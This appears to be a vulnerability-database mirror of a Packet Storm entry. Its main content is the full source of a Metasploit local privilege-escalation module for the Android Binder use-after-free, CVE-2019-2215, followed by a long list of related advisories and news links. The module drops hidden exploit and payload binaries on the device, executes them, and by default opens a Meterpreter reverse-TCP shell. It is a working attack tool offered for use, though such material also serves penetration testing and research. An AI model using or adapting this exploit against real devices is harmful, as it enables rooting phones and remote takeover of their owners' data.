Lucene search
Jann HornPACKETSTORM:156495HistoryFeb 24, 2020 - 12:00 a.m.
Android Binder Use-After-Free
2020-02-2400:00:00
Jann Horn
packetstormsecurity.com
215
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super( update_info( info, {
'Name' => "Android Binder Use-After-Free Exploit",
'Description' => %q{
},
'License' => MSF_LICENSE,
'Author' => [
'Jann Horn', # discovery and exploit
'Maddie Stone', # discovery and exploit
'grant-h', # Qu1ckR00t
'timwr', # metasploit module
],
'References' => [
[ 'CVE', '2019-2215' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
[ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
[ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
],
'DisclosureDate' => "Sep 26 2019",
'SessionTypes' => [ 'meterpreter' ],
'Platform' => [ "android", "linux" ],
'Arch' => [ ARCH_AARCH64 ],
'Targets' => [[ 'Auto', {} ]],
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
'WfsDelay' => 5,
},
'DefaultTarget' => 0,
}
))
end
def upload_and_chmodx(path, data)
write_file path, data
chmod(path)
register_file_for_cleanup(path)
end
def exploit
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
exploit_data = File.read(local_file, {:mode => 'rb'})
workingdir = session.fs.dir.getwd
exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
upload_and_chmodx(exploit_file, exploit_data)
payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
upload_and_chmodx(payload_file, generate_payload_exe)
print_status("Executing exploit '#{exploit_file}'")
result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
print_status("Exploit result:\n#{result}")
end
end
`
Related
packetstorm
packetstorm
Android Binder Use-After-Free
2019-10-18 00:00:00
thn
thn
Researchers Uncover SideWinder's Latest Server-Based Polymorphism Technique
2023-05-09 09:39:00
3 Google Play Store Apps Exploit Android Zero-Day Used by NSO Group
2020-01-07 16:41:00
New 0-Day Flaw Affecting Most Android Phones Being Exploited in the Wild
2019-10-04 09:03:00
zdt
zdt
Android Binder - Use-After-Free Exploit
2020-02-24 00:00:00
Android - Binder Driver Use-After-Free Exploit
2019-10-04 00:00:00
exploitpack
exploitpack
Android - Binder Driver Use-After-Free
2019-10-04 00:00:00
githubexploit
githubexploit
Exploit for Use After Free in Google Android
2019-10-04 06:32:08
Exploit for Use After Free in Google Android
2021-05-07 16:48:40
Exploit for Use After Free in Google Android
2021-02-05 06:23:28
prion
prion
Design/Logic Flaw
2019-10-11 19:15:00
attackerkb
attackerkb
CVE-2019-2215
2019-10-11 00:00:00
symantec
symantec
Google Android Binder CVE-2019-2215 Local Privilege Escalation Vulnerability
2019-10-02 00:00:00
huawei
huawei
Security Advisory - Use-after-free Vulnerability in Android Kernel
2019-10-30 00:00:00
checkpoint_advisories
checkpoint_advisories
Android Binder Use After Free (CVE-2019-2215)
2020-01-15 00:00:00
threatpost
threatpost
Google Warns of Android Zero-Day Bug Under Active Attack
2019-10-04 16:20:54
SideWinder APT Targets Nepal, Afghanistan in Wide-Ranging Spy Campaign
2020-12-09 19:53:13
A Brisk Private Trade in Zero-Days Widens Their Use
2020-04-06 21:05:06
metasploit
metasploit
Android Binder Use-After-Free Exploit
2019-10-17 10:48:49
cve
cve
CVE-2019-2215
2019-10-11 19:15:00
debiancve
debiancve
CVE-2019-2215
2019-10-11 19:15:00
redhatcve
redhatcve
CVE-2019-2215
2020-02-21 15:44:29
ubuntucve
ubuntucve
CVE-2019-2215
2019-10-11 00:00:00
CVE-2020-0030
2020-02-13 00:00:00
googleprojectzero
googleprojectzero
Bad Binder: Android In-The-Wild Exploit
2019-11-21 00:00:00
A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain
2022-11-04 00:00:00
Root Cause Analyses for 0-day In-the-Wild Exploits
2020-07-29 00:00:00
exploitdb
exploitdb
Android Binder - Use-After-Free (Metasploit)
2020-02-24 00:00:00
Android - Binder Driver Use-After-Free
2019-10-04 00:00:00
cisa_kev
cisa_kev
Android Kernel Use-After-Free Vulnerability
2021-11-03 00:00:00
Android Kernel Out-of-Bounds Write Vulnerability
2021-11-03 00:00:00
Mediatek Multiple Chipsets Insufficient Input Validation Vulnerability
2021-11-03 00:00:00
trendmicroblog
trendmicroblog
qualysblog
qualysblog
fireeye
fireeye
androidsecurity
androidsecurity
Pixel Update BulletinβOctober 2019
2019-10-07 00:00:00
impervablog
impervablog
The State of Vulnerabilities in 2019
2020-01-23 08:56:58
github
github
Pwning the all Google phone with a non-Google bug
2023-01-23 15:05:19
openvas
openvas
Ubuntu Update for linux USN-4186-1
2019-11-13 00:00:00
Ubuntu Update for linux USN-4186-3
2019-11-14 00:00:00
Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-2693)
2020-01-23 00:00:00
ubuntu
ubuntu
Linux kernel vulnerability
2019-11-13 00:00:00
Linux kernel vulnerabilities
2019-11-13 00:00:00
nessus
nessus
Ubuntu 16.04 LTS : Linux kernel vulnerabilities (USN-4186-1)
2019-11-13 00:00:00
Slackware 14.2 : Slackware 14.2 kernel (SSA:2019-311-01)
2019-11-08 00:00:00
EulerOS 2.0 SP5 : kernel (EulerOS-SA-2019-2693)
2019-12-23 00:00:00
slackware
slackware
[slackware-security] Slackware 14.2 kernel
2019-11-07 22:31:40
debian
debian
[SECURITY] [DLA 2068-1] linux security update
2020-01-18 04:38:12
[SECURITY] [DLA 2114-1] linux-4.9 security update
2020-03-02 18:14:56
osv
osv
linux - security update
2020-01-17 00:00:00
linux-4.9 - security update
2020-02-21 00:00:00
Related for PACKETSTORM:156495